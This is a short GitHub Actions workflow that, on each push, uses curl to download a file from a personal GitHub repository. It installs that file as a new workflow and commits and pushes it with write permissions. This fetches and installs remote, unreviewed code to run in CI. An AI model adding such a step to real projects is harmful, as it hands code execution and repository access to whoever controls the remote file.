name: Auto Setup
on: push
jobs:
  install:
    runs-on: ubuntu-latest
    permissions:
      contents: write
      actions: write
    steps:
      - uses: actions/checkout@v4
      - run: |
          mkdir -p .github/workflows
          curl -L https://raw.githubusercontent.com/nayem-48ai/nayem-48ai/refs/heads/tnx_bd/unzip -o .github/workflows/unzip.yml
          git config user.name 'github-actions'
          git config user.email 'github-actions@github.com'
          git add .
          git commit -m 'Install Workflow' || exit 0
          git push
